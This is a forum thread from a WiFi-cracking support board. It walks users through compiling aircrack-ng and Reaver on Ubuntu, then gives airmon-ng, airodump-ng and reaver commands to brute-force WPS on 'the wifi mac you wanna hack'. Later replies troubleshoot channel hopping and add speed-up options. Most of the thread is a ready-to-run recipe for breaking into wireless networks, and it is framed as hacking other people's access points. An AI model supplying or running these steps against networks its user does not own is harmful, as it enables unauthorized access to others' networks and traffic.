Info Reaver-Ubuntu

Discussion in 'Xiaopan Support' started by JD60, 6 Nov 2013.

  1. JD60

    JD60 Well-Known Member

    Joined:
    5 Nov 2013
    Messages:
    5
    Likes Received:
    3
    Hello everyone this thread was made to help a user "Trol" :)

    You may know that Ubuntu is a really great Program iso by checking the problem that had encounter when using Reaver are 2 errors that is easily (Solved)
    First is the error in wich the adapter like wlan0, mon0, eth0,1,2 depends how many it could be put on your computer.


    Second error is when you run reaver and in an instant say 'Error wpa handshake not found quitting....' Is like why reaver want the handshake but back to the Topic
    Here are the steps to follow


    First you must be connected to your wifi (of course) :trollface2:

    First go and enter in the upper left logo ----> this one ubuntu_logo.png

    Look for the Terminal

    and write: sudo apt-get install build-essential

    in the same write: sudo apt-get install libssl-dev

    Download this rar and extract it (put it anywhere were is easy to find for next step root folder better)
    aircrack-ng-1.1.rar

    -THIS IS THE FIRST ERROR SOLVED- :truestory:
    Then Open the folder and look for common.mak open it with gedit and scroll to the end of the page and look for
    CFLAGS ?= -g -W -Wall -Werror -O3 you erase the -Werror and it must look like this CFLAGS ?= -g -W -Wall -03 save the file and continue the next step.

    Close the terminal and open a new one, and this is pointing were is the aircrack folder if you put in root is cd aircrack-ng-1.1 if not and lefted in downloads same thing but with the downloads part cd dowloads/aircrack-ng-1.1


    Now write: make

    -Hope you following-

    then write: sudo make install

    Finally we now reach the Reaver part, be focus please :happy: We are finishing

    In a new terminal write: sudo apt-get install libpcap-dev sqlite3 libsqlite3-dev libpcap0.8-dev

    Download the tar.gz file from here
    http://reaver-wps.googlecode.com/files/reaver-1.4.tar.gz (just click and download itself) more easy for you people :)


    Extract to your download folder or root folder we gonna make the same step like before.

    Write: cd Downloads/reaver-1.4/src <---- folder, root-----> cd reaver-1.4/src

    Write: ./configure

    Write: make

    Write: sudo make install

    We Finished!!!!!!!!!

    Now to know if it works in the terminal run this... If your not root access in the first part write 'sudo'

    sudo airmon-ng
    sudo airmon-ng start (your adapter) (ath0,wlan0,mon0)
    sudo airodump-ng (your adapter)


    and to answer the second error is that I notice the person didnt use the sudo part, so is.

    sudo reaver -i (your adapter) -b (the wifi mac you wanna hack 08:23:D2:xx.xx) -vv and wait to get the authentication and your done, grab a coffee download.jpg and some donuts images (1).jpg and do anything cause it would take hours even days depending the distance and your patient :mustresist:

    Thanks for watching and any question feel free to ask :psy
     

    Attached Files:

    • Like Like x 1
  2. trol

    trol Member

    Joined:
    5 Nov 2013
    Messages:
    2
    Likes Received:
    0
    Hi, I run Ubuntu 12.04 (on acer laptop) and have properly installed reaver and aircrack-ng.

    When I press iwconfig I get:
    _______________________________________________________

    root@Texperiment:~# iwconfig
    lo no wireless extensions.

    eth0 no wireless extensions.

    eth1 IEEE 802.11bg ESSID:"IDEMAX"
    Mode:Managed Frequency:2.412 GHz Access Point: 00:1D:6A:A4:10:63
    Bit Rate:54 Mb/s Tx-Power=20 dBm Sensitivity=8/0
    Retry limit:7 RTS thr:eek:ff Fragment thr:eek:ff
    Encryption key:A1B2-C3D4-E5 Security mode:eek:pen
    Power Management:eek:ff
    Link Quality=73/100 Signal level=-55 dBm Noise level=-91 dBm
    Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
    Tx excessive retries:0 Invalid misc:32 Missed beacon:12
    _______________________________________________________

    So i tried a lot of things and the one thing that only will work for me is entering following command lines.

    sudo airmon-ng start eth1
    sudo airodump-ng eth1

    after that I receive a list with networks so I chose my own network and my BSSID and than I type:

    sudo reaver -i eth1 -b (my BSSID) -vv

    after that, it keeps swithing channels 1 to 2 to 3 to ... to 14 and over and over again.

    what do I have to do ?...
    ___________________________________________________________
    EXTRA INFORMATION

    I have also 2 other laptops
    with other laptop(1) I have to use following commandlines:

    sudo airmon-ng start wlan0
    sudo airodump-ng wlan0

    after that I receive a list with networks so I chose my own network and my BSSID and than I type:

    sudo reaver -i wlan0 -b (my BSSID) -vv

    (it also keeps changing channels)

    with laptop(2)
    i even can't reach the list with networks...

    THANKS FOR ANY HELP ;)
     
  3. JD60

    JD60 Well-Known Member

    Joined:
    5 Nov 2013
    Messages:
    5
    Likes Received:
    3
    I see that your connected to the internet when your doing that. you must not be connected to the internet,
    (eth1 IEEE 802.11bg ESSID:"IDEMAX"
    Mode:Managed Frequency:2.412 GHz Access Point: 00:1D:6A:A4:10:63)
    start up your wireless card and in reaver adjust the channel hopping, use
    sudo reaver -i (your adapter) -c (channel) -b (bssid) -vv
    you can add extra speed after -vv --dh-small for making the procces fast atlease
    you can see the channel when you use sudo airodump-ng (adapter) let it search the wifi and stop it with Ctrl+C
    Upper part in the terminal search the CH# (channel)
     
  4. trol

    trol Member

    Joined:
    5 Nov 2013
    Messages:
    2
    Likes Received:
    0
    Thanks, i just founded that out :)[/quote]
     
  5. JD60

    JD60 Well-Known Member

    Joined:
    5 Nov 2013
    Messages:
    5
    Likes Received:
    3
    No problem glad I could help :) :eek:hstopityou:
     

Share This Page

Loading...